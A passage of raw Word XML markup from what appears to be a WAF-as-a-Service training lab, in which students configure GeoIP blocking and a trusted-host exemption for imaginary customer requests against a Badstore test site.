          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="2ADCC194">
        <w:rPr/>
        <w:t>First Tests</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1FEADC78" w:rsidP="5BDB08D7" w:rsidRDefault="1FEADC78" w14:paraId="12184B1D" w14:textId="09A0BD66">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="4FEC3F21">
        <w:rPr/>
        <w:t xml:space="preserve">Open your browser, in the URL address bar paste in </w:t>
      </w:r>
      <w:r w:rsidR="7911D2BB">
        <w:rPr/>
        <w:t xml:space="preserve">your unique </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="292AE1B6">
        <w:rPr/>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="292AE1B6">
        <w:rPr/>
        <w:t xml:space="preserve"> ad</w:t>
      </w:r>
      <w:r w:rsidR="7972AB90">
        <w:rPr/>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="292AE1B6">
        <w:rPr/>
        <w:t>ress ( th</w:t>
      </w:r>
      <w:r w:rsidR="1337E022">
        <w:rPr/>
        <w:t>at</w:t>
      </w:r>
      <w:r w:rsidR="292AE1B6">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="419C25CE">
        <w:rPr/>
        <w:t>you copied</w:t>
      </w:r>
      <w:r w:rsidR="1865DC8D">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="5D938559">
        <w:rPr/>
        <w:t xml:space="preserve">earlier </w:t>
      </w:r>
      <w:r w:rsidR="28C5EC34">
        <w:rPr/>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="051E4BD9">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and make sure the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="051E4BD9">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="051E4BD9">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="1A6DFF5C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">web site </w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="051E4BD9">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">loads.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1FEADC78" w:rsidP="5BDB08D7" w:rsidRDefault="1FEADC78" w14:paraId="3005F8DB" w14:textId="2909DB10">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="051E4BD9">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Congratulations on making it this far!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3372C4DA" w:rsidP="1FEADC78" w:rsidRDefault="3372C4DA" w14:paraId="3CB86701" w14:textId="3540A91F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="3372C4DA">
        <w:drawing>
          <wp:inline wp14:editId="18449FDF" wp14:anchorId="203C39A0">
            <wp:extent cx="581025" cy="581025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1163637750" name="" descr="Stop photos, royalty-free images, graphics, vectors &amp; videos | Adobe Stock" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rebe092984cf140e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81025" cy="581025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="7B06AB01">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Please </w:t>
      </w:r>
      <w:r w:rsidRPr="4CBE4E3E" w:rsidR="20EA645D">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">let the instructor know you have reached this point. </w:t>
      </w:r>
      <w:r w:rsidR="20EA645D">
        <w:drawing>
          <wp:inline wp14:editId="0FE28B6B" wp14:anchorId="57C94A77">
            <wp:extent cx="523875" cy="521132"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1187377551" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R49ee8391588744b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875" cy="521132"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidRDefault="699639B3" w14:paraId="7F15C254" w14:textId="4AF4EA87">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072E2A" w:rsidP="00072E2A" w:rsidRDefault="00072E2A" w14:paraId="513E8630" w14:textId="654D303F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t>Customer Requested Configurat</w:t>
      </w:r>
      <w:r w:rsidR="00E90E4D">
        <w:rPr/>
        <w:t>ion</w:t>
      </w:r>
      <w:r w:rsidR="4DA02A6D">
        <w:rPr/>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="4DA02A6D">
        <w:rPr/>
        <w:t>GeoIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="4DA02A6D">
        <w:rPr/>
        <w:t xml:space="preserve"> Enforcement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E90E4D" w:rsidP="00E90E4D" w:rsidRDefault="00E90E4D" w14:paraId="4FCA761C" w14:textId="3AB74EB8">
      <w:r w:rsidR="034CAB72">
        <w:rPr/>
        <w:t>Continuing</w:t>
      </w:r>
      <w:r w:rsidR="439C583C">
        <w:rPr/>
        <w:t xml:space="preserve"> with our imaginary </w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="00E90E4D">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="19B85AC4">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>roof-of-Concept</w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="5BB4D0EA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="5BB4D0EA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="00E90E4D">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E90E4D">
        <w:rPr/>
        <w:t xml:space="preserve">WAF-as-a-Service, your </w:t>
      </w:r>
      <w:r w:rsidR="44775E31">
        <w:rPr/>
        <w:t xml:space="preserve">imaginary </w:t>
      </w:r>
      <w:r w:rsidR="00E90E4D">
        <w:rPr/>
        <w:t xml:space="preserve">customer has </w:t>
      </w:r>
      <w:r w:rsidR="56DC7E6B">
        <w:rPr/>
        <w:t xml:space="preserve">now </w:t>
      </w:r>
      <w:r w:rsidR="00E90E4D">
        <w:rPr/>
        <w:t>requested the following</w:t>
      </w:r>
      <w:r w:rsidR="14A37FED">
        <w:rPr/>
        <w:t xml:space="preserve"> security configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E90E4D" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="294EECE8" w14:textId="135776DB">
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="007D01EA">
        <w:t>I only do business with US and UK. Can you block all other countries? I also want to block TOR nodes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and anonymous proxies</w:t>
      </w:r>
      <w:r w:rsidRPr="007D01EA">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="4752BFD6" w14:textId="341931F2">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidR="15E0CB9B">
        <w:rPr/>
        <w:t>Hint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="5BDB08D7" w:rsidRDefault="007D01EA" w14:paraId="6EDB2B4A" w14:textId="53A3F468">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="5F874970">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">You will need to add a component to the left-hand navigation tree.  Find and click on “Add Components” and then scroll through </w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="15E0CB9B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">the available components in WAFaaS to see what would help block web requests </w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="00874BA5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="15E0CB9B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="00874BA5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">are not from </w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="15E0CB9B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>the U</w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="6AB88606">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="15E0CB9B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="6076021D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">or the </w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="15E0CB9B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>UK.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="68991AB6" w14:textId="637133B6">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="37C75D7D" w14:textId="5C19B8D0">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidR="53511C53">
        <w:rPr/>
        <w:t>Spoiler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="5BDB08D7" w:rsidRDefault="007D01EA" w14:paraId="25BE37B5" w14:textId="4072B7E3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t xml:space="preserve">Add the </w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="007D01EA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>IP Address Geolocation</w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t xml:space="preserve"> component</w:t>
      </w:r>
      <w:r w:rsidR="1586DAB5">
        <w:rPr/>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1586DAB5" w:rsidP="21B1CB40" w:rsidRDefault="1586DAB5" w14:paraId="63C6D1E2" w14:textId="52608122">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="1586DAB5">
        <w:drawing>
          <wp:inline wp14:editId="1838BF69" wp14:anchorId="19A91872">
            <wp:extent cx="4791145" cy="2124075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="420279602" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rfe0c71b5fcb54b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91145" cy="2124075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="59849F4E" w14:textId="3568D784">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t xml:space="preserve">In the Geo IP Filter card, move all countries </w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="007D01EA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">except </w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>United States and United Kingdom to the Blocked side.</w:t>
      </w:r>
      <w:r w:rsidR="4266A2AE">
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="4F6FC872" w14:textId="1D77613D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>Turn on blocking for TOR Nodes and Anonymous Proxies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007D01EA" w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="07DA250D" w14:textId="26751F35">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>Click Save.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0CFF0B51" w:rsidRDefault="0CFF0B51" w14:paraId="2AD24BCC" w14:textId="7CFBF1B9">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="1E869D41" w:rsidP="5BDB08D7" w:rsidRDefault="1E869D41" w14:paraId="48FBB9F9" w14:textId="0D17C263">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="1E869D41">
        <w:rPr/>
        <w:t>Customer Requested Configuration - Trusted Host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="3F2D05B2" w14:textId="210C4FB7">
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>I have a</w:t>
      </w:r>
      <w:r w:rsidR="5FF5976E">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="21AF5909">
        <w:rPr/>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="21AF5909">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>rd</w:t>
      </w:r>
      <w:r w:rsidR="21AF5909">
        <w:rPr/>
        <w:t xml:space="preserve"> party </w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t xml:space="preserve">service that </w:t>
      </w:r>
      <w:r w:rsidR="6B5BCE3A">
        <w:rPr/>
        <w:t xml:space="preserve">crawls </w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t xml:space="preserve">accesses the store and I want it to be exempt from all </w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>WAF</w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t xml:space="preserve"> checks</w:t>
      </w:r>
      <w:r w:rsidR="1B722F6C">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>and be able to do anything unconditionally</w:t>
      </w:r>
      <w:r w:rsidR="264EE83A">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>The service always sends requests from 38.227.79.50</w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="610B3734" w14:textId="390970F6">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidR="4CE0FD67">
        <w:rPr/>
        <w:t>Hint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="32965056" w:rsidRDefault="007D01EA" w14:paraId="619A5F6E" w14:textId="3228C540">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="40" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="32965056" w:rsidR="771C133F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Look </w:t>
      </w:r>
      <w:r w:rsidRPr="32965056" w:rsidR="4CE0FD67">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">at the available components in WAFaaS to see what would </w:t>
      </w:r>
      <w:r w:rsidRPr="32965056" w:rsidR="394A2234">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>allow requests from a specific IP to be always “trusted”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="32965056" w:rsidRDefault="007D01EA" w14:paraId="549B99D4" w14:textId="1F48B705">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="674D2E56" w14:textId="627B1856">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidR="0E3A0393">
        <w:rPr/>
        <w:t>Sppiler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="5BDB08D7" w:rsidRDefault="007D01EA" w14:paraId="15DE336D" w14:textId="486930E7">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t xml:space="preserve">Add the </w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="007D01EA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Trusted Hosts</w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t xml:space="preserve"> component.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3A943E86" w:rsidP="21B1CB40" w:rsidRDefault="3A943E86" w14:paraId="266DA2F8" w14:textId="351E17CA">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
